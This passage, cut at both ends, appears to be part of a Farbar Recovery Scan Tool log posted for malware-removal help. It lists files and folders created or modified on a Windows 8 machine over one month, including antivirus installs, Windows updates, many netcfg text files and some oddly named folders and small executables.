Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys</p><p>2014-11-30 20:00 - 2014-11-30 20:00 - 00001102 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk</p><p>2014-11-30 20:00 - 2014-11-30 20:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware</p><p>2014-11-30 20:00 - 2014-11-30 20:00 - 00000000 ____D () C:\ProgramData\Malwarebytes</p><p>2014-11-30 20:00 - 2014-11-30 20:00 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware</p><p>2014-11-30 20:00 - 2014-10-01 11:11 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys</p><p>2014-11-30 20:00 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys</p><p>2014-11-30 19:52 - 2014-11-30 19:52 - 00000117 _____ () C:\Windows\system32\netcfg-357703.txt</p><p>2014-11-30 19:47 - 2014-11-30 19:47 - 00000117 _____ () C:\Windows\system32\netcfg-96156.txt</p><p>2014-11-30 19:46 - 2014-12-01 09:28 - 00005748 _____ () C:\Windows\PFRO.log</p><p>2014-11-30 19:43 - 2014-11-30 19:43 - 00000167 _____ () C:\Windows\system32\netcfg-116564500.txt</p><p>2014-11-30 19:43 - 2014-11-30 19:43 - 00000117 _____ () C:\Windows\system32\netcfg-116559484.txt</p><p>2014-11-30 19:43 - 2014-11-30 19:43 - 00000117 _____ () C:\Windows\system32\netcfg-116556640.txt</p><p>2014-11-30 19:33 - 2014-11-30 21:40 - 202839360 _____ (Kaspersky Lab) C:\Users\johnsmith\Downloads\kis15.0.1.415EN_6874.exe</p><p>2014-11-30 10:16 - 2014-12-01 06:21 - 00961086 _____ () C:\Windows\WindowsUpdate.log</p><p>2014-11-29 12:11 - 2014-11-29 12:11 - 00000117 _____ () C:\Windows\system32\netcfg-3028671.txt</p><p>2014-11-29 12:11 - 2014-11-29 12:11 - 00000117 _____ () C:\Windows\system32\netcfg-3022500.txt</p><p>2014-11-27 13:22 - 2014-11-27 13:22 - 00000117 _____ () C:\Windows\system32\netcfg-45219796.txt</p><p>2014-11-27 13:22 - 2014-11-27 13:22 - 00000117 _____ () C:\Windows\system32\netcfg-45219750.txt</p><p>2014-11-27 12:51 - 2014-11-27 12:51 - 00000117 _____ () C:\Windows\system32\netcfg-43350140.txt</p><p>2014-11-27 12:51 - 2014-11-27 12:51 - 00000117 _____ () C:\Windows\system32\netcfg-43350078.txt</p><p>2014-11-27 11:59 - 2014-11-27 11:59 - 00000117 _____ () C:\Windows\system32\netcfg-40248046.txt</p><p>2014-11-27 11:59 - 2014-11-27 11:59 - 00000117 _____ () C:\Windows\system32\netcfg-40247437.txt</p><p>2014-11-27 00:48 - 2014-11-27 00:48 - 00000117 _____ () C:\Windows\system32\netcfg-80960203.txt</p><p>2014-11-26 18:07 - 2014-11-27 00:48 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\Iravbypa</p><p>2014-11-26 18:03 - 2014-11-30 20:33 - 00000000 ____D () C:\ProgramData\NicwEsray</p><p>2014-11-26 02:23 - 2014-11-26 02:23 - 00000117 _____ () C:\Windows\system32\netcfg-276359.txt</p><p>2014-11-26 02:18 - 2014-11-26 02:18 - 00000117 _____ () C:\Windows\system32\netcfg-57643953.txt</p><p>2014-11-26 00:23 - 2014-11-26 00:23 - 00000117 _____ () C:\Windows\system32\netcfg-50768500.txt</p><p>2014-11-26 00:23 - 2014-11-26 00:23 - 00000117 _____ () C:\Windows\system32\netcfg-50768421.txt</p><p>2014-11-25 18:46 - 2014-11-26 02:18 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\FrameworkUpdate</p><p>2014-11-25 16:44 - 2014-11-25 16:44 - 00000117 _____ () C:\Windows\system32\netcfg-23231437.txt</p><p>2014-11-25 16:44 - 2014-11-25 16:44 - 00000117 _____ () C:\Windows\system32\netcfg-23231328.txt</p><p>2014-11-25 15:56 - 2014-11-25 15:56 - 00001475 _____ () C:\Users\johnsmith\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google.lnk</p><p>2014-11-25 10:54 - 2014-11-25 10:54 - 00000117 _____ () C:\Windows\system32\netcfg-2195375.txt</p><p>2014-11-25 10:19 - 2014-11-25 10:19 - 00000117 _____ () C:\Windows\system32\netcfg-125890.txt</p><p>2014-11-23 17:33 - 2014-11-23 17:33 - 00000117 _____ () C:\Windows\system32\netcfg-109928343.txt</p><p>2014-11-23 17:33 - 2014-11-23 17:33 - 00000117 _____ () C:\Windows\system32\netcfg-109928281.txt</p><p>2014-11-23 17:32 - 2014-11-23 17:32 - 00000117 _____ () C:\Windows\system32\netcfg-109871812.txt</p><p>2014-11-23 17:32 - 2014-11-23 17:32 - 00000117 _____ () C:\Windows\system32\netcfg-109871734.txt</p><p>2014-11-23 15:32 - 2014-11-23 15:32 - 00000117 _____ () C:\Windows\system32\netcfg-102657734.txt</p><p>2014-11-23 15:32 - 2014-11-23 15:32 - 00000117 _____ () C:\Windows\system32\netcfg-102657562.txt</p><p>2014-11-22 17:17 - 2014-11-22 17:17 - 00000117 _____ () C:\Windows\system32\netcfg-22575437.txt</p><p>2014-11-22 11:03 - 2014-11-22 11:03 - 00000117 _____ () C:\Windows\system32\netcfg-137015.txt</p><p>2014-11-20 09:44 - 2014-11-20 09:44 - 00000117 _____ () C:\Windows\system32\netcfg-53047234.txt</p><p>2014-11-20 07:40 - 2014-11-20 07:40 - 00000117 _____ () C:\Windows\system32\netcfg-45565703.txt</p><p>2014-11-20 01:14 - 2014-11-08 04:22 - 00238080 _____ (Microsoft Corporation) C:\Windows\system32\pku2u.dll</p><p>2014-11-20 01:14 - 2014-11-08 04:21 - 00827904 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll</p><p>2014-11-20 01:14 - 2014-11-07 23:57 - 00187904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pku2u.dll</p><p>2014-11-20 01:14 - 2014-11-07 23:56 - 00666624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll</p><p>2014-11-20 01:14 - 2014-10-11 01:35 - 00171840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys</p><p>2014-11-20 01:14 - 2014-10-11 00:44 - 00588288 _____ (Microsoft Corporation) C:\Windows\system32\SHCore.dll</p><p>2014-11-20 01:14 - 2014-10-11 00:43 - 01281536 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll</p><p>2014-11-20 01:14 - 2014-10-10 22:57 - 00452608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SHCore.dll</p><p>2014-11-20 01:14 - 2014-05-29 16:02 - 00439808 _____ (Microsoft Corporation) C:\Windows\system32\lsm.dll</p><p>2014-11-20 01:14 - 2014-04-12 02:10 - 00578048 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe</p><p>2014-11-20 01:14 - 2014-04-12 02:09 - 01043968 _____ (Microsoft Corporation) C:\Windows\system32\usercpl.dll</p><p>2014-11-20 01:14 - 2014-04-12 02:09 - 00208896 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll</p><p>2014-11-20 01:14 - 2014-04-12 02:09 - 00094720 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll</p><p>2014-11-20 01:14 - 2014-04-12 02:08 - 00318464 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll</p><p>2014-11-20 01:14 - 2014-04-12 02:07 - 00020480 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll</p><p>2014-11-20 01:14 - 2014-04-12 00:23 - 00961536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usercpl.dll</p><p>2014-11-20 01:14 - 2014-04-12 00:23 - 00273920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll</p><p>2014-11-20 01:14 - 2014-04-12 00:23 - 00178688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll</p><p>2014-11-20 01:14 - 2014-04-12 00:23 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll</p><p>2014-11-20 01:14 - 2014-04-12 00:22 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll</p><p>2014-11-20 01:14 - 2014-04-11 23:58 - 00014848 _____ (Microsoft Corporation) C:\Windows\system32\workerdd.dll</p><p>2014-11-20 01:14 - 2014-03-03 16:07 - 00570216 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys</p><p>2014-11-19 20:57 - 2014-11-19 20:57 - 00000117 _____ () C:\Windows\system32\netcfg-7000390.txt</p><p>2014-11-19 20:52 - 2014-11-19 20:52 - 00000117 _____ () C:\Windows\system32\netcfg-6735375.txt</p><p>2014-11-19 19:26 - 2014-11-19 19:26 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys</p><p>2014-11-19 19:26 - 2014-11-19 19:26 - 00000000 ____D () C:\ProgramData\RogueKiller</p><p>2014-11-19 13:25 - 2014-11-19 13:25 - 00000117 _____ () C:\Windows\system32\netcfg-14821203.txt</p><p>2014-11-19 13:25 - 2014-11-19 13:25 - 00000117 _____ () C:\Windows\system32\netcfg-14820968.txt</p><p>2014-11-18 07:57 - 2014-11-18 07:57 - 00000117 _____ () C:\Windows\system32\netcfg-57518609.txt</p><p>2014-11-18 07:56 - 2014-11-18 07:56 - 00000117 _____ () C:\Windows\system32\netcfg-57439656.txt</p><p>2014-11-14 19:39 - 2014-11-17 15:26 - 00000000 ____D () C:\Users\johnsmith\Downloads\walking-dead-S03</p><p>2014-11-14 19:36 - 2014-11-17 15:26 - 00000000 ____D () C:\Users\johnsmith\Downloads\walking-dead-S01</p><p>2014-11-14 19:34 - 2014-11-17 10:35 - 00000000 ____D () C:\Users\johnsmith\Downloads\walking-dead-S02</p><p>2014-11-14 16:06 - 2014-11-14 16:06 - 00000325 _____ () C:\Users\johnsmith\Desktop\Employee Calendar.url</p><p>2014-11-14 13:07 - 2014-11-14 13:07 - 00000117 _____ () C:\Windows\system32\netcfg-696923281.txt</p><p>2014-11-13 09:01 - 2014-11-13 09:01 - 00000117 _____ () C:\Windows\system32\netcfg-595764046.txt</p><p>2014-11-13 09:01 - 2014-11-13 09:01 - 00000117 _____ () C:\Windows\system32\netcfg-595763968.txt</p><p>2014-11-12 09:04 - 2014-11-12 09:04 - 00000117 _____ () C:\Windows\system32\netcfg-509518703.txt</p><p>2014-11-12 09:04 - 2014-11-12 09:04 - 00000117 _____ () C:\Windows\system32\netcfg-509518593.txt</p><p>2014-11-12 09:04 - 2014-11-12 09:04 - 00000117 _____ () C:\Windows\system32\netcfg-509512187.txt</p><p>2014-11-12 09:00 - 2014-11-12 09:00 - 00000117 _____ () C:\Windows\system32\netcfg-509313421.txt</p><p>2014-11-12 08:56 - 2014-11-12 08:56 - 00000117 _____ () C:\Windows\system32\netcfg-509068250.txt</p><p>2014-11-12 08:56 - 2014-11-12 08:56 - 00000117 _____ () C:\Windows\system32\netcfg-509062265.txt</p><p>2014-11-12 02:48 - 2014-09-24 16:29 - 00318976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll</p><p>2014-11-12 02:48 - 2014-09-24 16:29 - 00072192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncryptsslp.dll</p><p>2014-11-12 02:48 - 2014-09-24 16:01 - 00414208 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll</p><p>2014-11-12 02:48 - 2014-09-24 16:01 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\ncryptsslp.dll</p><p>2014-11-12 02:48 - 2014-08-21 16:56 - 01418752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll</p><p>2014-11-12 02:48 - 2014-08-21 16:27 - 01845760 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll</p><p>2014-11-12 02:48 - 2014-08-09 01:30 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe</p><p>2014-11-12 02:48 - 2014-08-09 01:29 - 00144896 _____ (Microsoft Corporation) C:\Windows\system32\tssdisai.dll</p><p>2014-11-12 02:47 - 2014-10-23 05:47 - 00079872 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll</p><p>2014-11-12 02:47 - 2014-10-23 04:04 - 00068096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll</p><p>2014-11-12 02:47 - 2014-10-18 01:44 - 00778240 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll</p><p>2014-11-12 02:47 - 2014-10-18 00:05 - 00567808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll</p><p>2014-11-12 02:47 - 2014-10-11 00:44 - 03248640 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll</p><p>2014-11-12 02:47 - 2014-10-10 22:41 - 00713728 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll</p><p>2014-11-12 02:47 - 2014-10-10 22:41 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll</p><p>2014-11-12 02:47 - 2014-10-10 22:05 - 00146944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll</p><p>2014-11-12 02:47 - 2014-10-10 22:04 - 00713728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll</p><p>2014-11-12 02:47 - 2014-10-02 18:21 - 00522728 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll</p><p>2014-11-12 02:47 - 2014-10-02 15:29 - 00783872 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll</p><p>2014-11-12 02:47 - 2014-10-02 15:29 - 00267264 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll</p><p>2014-11-12 02:47 - 2014-10-02 15:29 - 00169472 _____ (Microsoft Corporation) C:\Windows\system32\AudioEndpointBuilder.dll</p><p>2014-11-12 02:47 - 2014-10-01 16:05 - 04068864 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys</p><p>2014-11-12 02:47 - 2014-09-12 23:24 - 02233152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys</p><p>2014-11-12 02:47 - 2014-05-02 20:34 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll</p><p>2014-11-12 02:47 - 2012-10-12 01:08 - 00027880 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpvideominiport.sys</p><p>2014-11-12 02:47 - 2012-10-11 23:14 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\rfxvmt.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:56 - 02237952 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:56 - 01409536 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:56 - 00915968 _____ (Microsoft Corporation) C:\Windows\system32\uxtheme.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:56 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\UXInit.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:56 - 00051712 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe</p><p>2014-11-12 02:46 - 2014-10-25 18:55 - 19284480 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:55 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:55 - 00097280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:54 - 15399424 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:54 - 02655232 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:54 - 00855552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:54 - 00451584 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:54 - 00281600 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:54 - 00255488 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:54 - 00136704 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:53 - 01509376 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl</p><p>2014-11-12 02:46 - 2014-10-25 17:36 - 01762816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:35 - 01181696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:35 - 00493056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:35 - 00044032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UXInit.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:34 - 13758464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:34 - 02055168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:34 - 01441280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl</p><p>2014-11-12 02:46 - 2014-10-25 17:34 - 00357888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:34 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:34 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:34 - 00109056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:34 - 00033280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:19 - 02706432 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb</p><p>2014-11-12 02:46 - 2014-10-25 17:13 - 02706432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb</p><p>2014-11-12 02:46 - 2014-10-25 14:48 - 00534528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\uxtheme.dll</p><p>2014-11-12 02:46 - 2014-09-21 22:53 - 00035320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdBoot.sys</p><p>2014-11-12 02:46 - 2014-09-05 17:46 - 00389176 _____ () C:\Windows\system32\ApnDatabase.xml</p><p>2014-11-12 02:46 - 2014-09-02 19:48 - 00141824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll</p><p>2014-11-12 02:46 - 2014-09-02 19:22 - 00188928 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll</p><p>2014-11-12 02:46 - 2014-08-28 21:17 - 02043392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll</p><p>2014-11-12 02:46 - 2014-08-28 21:17 - 00227328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll</p><p>2014-11-12 02:46 - 2014-08-28 21:04 - 02837504 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll</p><p>2014-11-12 02:46 - 2014-08-28 21:04 - 00309248 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll</p><p>2014-11-12 02:46 - 2014-08-27 23:04 - 00499712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FXSCOMEX.dll</p><p>2014-11-12 02:46 - 2014-08-27 23:04 - 00227840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FXSAPI.dll</p><p>2014-11-12 02:46 - 2014-08-27 22:59 - 00616448 _____ (Microsoft Corporation) C:\Windows\system32\FXSAPI.dll</p><p>2014-11-12 02:46 - 2014-08-27 22:59 - 00609280 _____ (Microsoft Corporation) C:\Windows\system32\FXSCOMEX.dll</p><p>2014-11-12 02:46 - 2014-08-27 22:59 - 00432640 _____ (Microsoft Corporation) C:\Windows\system32\FXSTIFF.dll</p><p>2014-11-12 02:46 - 2014-08-27 22:59 - 00254976 _____ (Microsoft Corporation) C:\Windows\system32\FXST30.dll</p><p>2014-11-12 02:46 - 2014-08-26 15:08 - 00270024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdFilter.sys</p><p>2014-11-12 02:46 - 2014-07-24 06:12 - 00328512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Classpnp.sys</p><p>2014-11-12 02:45 - 2014-10-25 18:55 - 00197120 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll</p><p>2014-11-12 02:45 - 2014-10-25 18:54 - 03959296 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll</p><p>2014-11-12 02:45 - 2014-10-25 18:54 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll</p><p>2014-11-12 02:45 - 2014-10-25 18:54 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll</p><p>2014-11-12 02:45 - 2014-10-25 18:54 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll</p><p>2014-11-12 02:45 - 2014-10-25 17:35 - 14368768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll</p><p>2014-11-12 02:45 - 2014-10-25 17:35 - 00163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll</p><p>2014-11-12 02:45 - 2014-10-25 17:35 - 00080384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll</p><p>2014-11-12 02:45 - 2014-10-25 17:34 - 02861568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll</p><p>2014-11-12 02:45 - 2014-10-25 17:34 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll</p><p>2014-11-12 02:45 - 2014-10-25 17:34 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll</p><p>2014-11-12 02:45 - 2014-10-25 17:34 - 00039936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll</p><p>2014-11-10 11:28 - 2014-11-10 11:28 - 00000117 _____ () C:\Windows\system32\netcfg-345340312.txt</p><p>2014-11-10 11:28 - 2014-11-10 11:28 - 00000117 _____ () C:\Windows\system32\netcfg-345340234.txt</p><p>2014-11-10 08:04 - 2014-11-10 08:04 - 00000117 _____ () C:\Windows\system32\netcfg-333130109.txt</p><p>2014-11-10 08:04 - 2014-11-10 08:04 - 00000117 _____ () C:\Windows\system32\netcfg-333127046.txt</p><p>2014-11-08 23:43 - 2014-11-08 23:43 - 00000117 _____ () C:\Windows\system32\netcfg-216665062.txt</p><p>2014-11-08 23:43 - 2014-11-08 23:43 - 00000117 _____ () C:\Windows\system32\netcfg-216664734.txt</p><p>2014-11-08 20:51 - 2014-11-08 20:51 - 00000117 _____ () C:\Windows\system32\netcfg-206372718.txt</p><p>2014-11-08 20:51 - 2014-11-08 20:51 - 00000117 _____ () C:\Windows\system32\netcfg-206371781.txt</p><p>2014-11-08 18:54 - 2014-11-09 23:10 - 00000000 ____D () C:\Users\johnsmith\Downloads\bosch.s01e01.pilot.720p.webrip.x264-w4f-sample.mkv</p><p>2014-11-07 09:27 - 2014-11-07 09:27 - 00000117 _____ () C:\Windows\system32\netcfg-78900203.txt</p><p>2014-11-07 09:27 - 2014-11-07 09:27 - 00000117 _____ () C:\Windows\system32\netcfg-78898078.txt</p><p>2014-11-07 01:42 - 2014-11-14 11:23 - 00000000 ____D () C:\Users\johnsmith\Downloads\polyphonic spree (1)</p><p>2014-11-07 01:34 - 2014-11-07 01:37 - 00000000 ____D () C:\Users\johnsmith\Downloads\polyphonic spree</p><p>2014-11-06 11:31 - 2014-11-06 11:31 - 00002560 _____ () C:\Users\johnsmith\AppData\Local\6A815FEA01B.exe</p><p>2014-11-06 11:26 - 2014-11-06 11:26 - 00002560 _____ () C:\Users\johnsmith\AppData\Local\EB79B990EB2A.exe</p><p></p><p>==================== One Month Modified Files and Folders =======</p><p></p><p>(If an entry is included in the fixlist, the file\folder will be moved.)</p><p></p><p>2014-12-01 09:38 - 2012-07-25 22:26 - 00262144 ___SH () C:\Windows\system32\config\ELAM</p><p>2014-12-01 09:36 - 2012-07-26 01:12 - 00000000 ___HD () C:\Windows\ELAMBKUP</p><p>2014-12-01 09:35 - 2014-05-08 13:10 - 00000928 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job</p><p>2014-12-01 09:35 - 2012-07-26 00:28 - 00941114 _____ () C:\Windows\system32\PerfStringBackup.INI</p><p>2014-12-01 09:31 - 2014-05-08 13:10 - 00000924 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job</p><p>2014-12-01 09:29 - 2012-07-26 00:22 - 00000006 ____H () C:\Windows\Tasks\SA.DAT</p><p>2014-12-01 09:26 - 2012-07-25 22:37 - 00000000 ____D () C:\Windows\servicing</p><p>2014-12-01 09:20 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\WinStore</p><p>2014-12-01 09:19 - 2012-07-26 01:12 - 00000000 ___RD () C:\Windows\ToastData</p><p>2014-12-01 09:19 - 2012-07-26 01:12 - 00000000 ___RD () C:\Windows\ImmersiveControlPanel</p><p>2014-12-01 09:19 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\PolicyDefinitions</p><p>2014-12-01 09:19 - 2012-07-25 22:38 - 00000000 ____D () C:\Windows\system32\oobe</p><p>2014-12-01 09:18 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility</p><p>2014-12-01 09:18 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility</p><p>2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools</p><p>2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools</p><p>2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories</p><p>2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files\Windows Defender</p><p>2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files (x86)\Windows Defender</p><p>2014-12-01 09:17 - 2012-07-26 00:52 - 00000000 ____D () C:\Program Files\Windows Journal</p><p>2014-12-01 09:14 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files\Windows Photo Viewer</p><p>2014-12-01 09:14 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files (x86)\Windows Photo Viewer</p><p>2014-12-01 09:14 - 2012-07-25 22:38 - 00000000 ____D () C:\Windows\SysWOW64\Dism</p><p>2014-12-01 09:14 - 2012-07-25 22:38 - 00000000 ____D () C:\Windows\system32\Dism</p><p>2014-12-01 09:00 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\system32\sru</p><p>2014-12-01 08:57 - 2012-07-26 00:59 - 00000000 ____D () C:\Windows\CbsTemp</p><p>2014-12-01 08:56 - 2013-01-24 23:13 - 00003598 _____ () C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2762839642-1568754923-376086736-1001</p><p>2014-12-01 08:25 - 2013-01-25 10:20 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\vlc</p><p>2014-12-01 07:52 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\system32\NDF</p><p>2014-12-01 07:51 - 2012-11-21 00:19 - 00002739 _____ () C:\Windows\system32\RaCoInst.log</p><p>2014-12-01 07:28 - 2013-01-25 00:49 - 00000000 ____D () C:\Users\johnsmith\Desktop\giganews</p><p>2014-12-01 07:19 - 2013-01-31 21:49 - 00000000 ____D () C:\Users\johnsmith\AppData\Local\CrashDumps</p><p>2014-11-30 20:33 - 2012-09-12 18:50 - 00000000 ____D () C:\Windows\en</p><p>2014-11-30 19:46 - 2012-07-25 22:26 - 00008192 ___SH () C:\Windows\system32\config\BBI</p><p>2014-11-30 19:35 - 2014-04-29 05:42 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\Binreader</p><p>2014-11-30 18:43 - 2014-09-24 20:10 - 00000000 ____D () C:\Users\johnsmith\Desktop\House Ideas</p><p>2014-11-29 09:58 - 2014-08-29 23:18 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\tixati</p><p>2014-11-25 16:39 - 2014-05-08 13:10 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk</p><p>2014-11-25 01:39 - 2014-06-08 18:36 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\Youtube Downloader HD</p><p>2014-11-25 01:38 - 2014-06-08 18:23 - 00001153 _____ () C:\Users\johnsmith\Desktop\Youtube Downloader HD.lnk</p><p>2014-11-25 01:38 - 2014-06-08 18:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Youtube Downloader 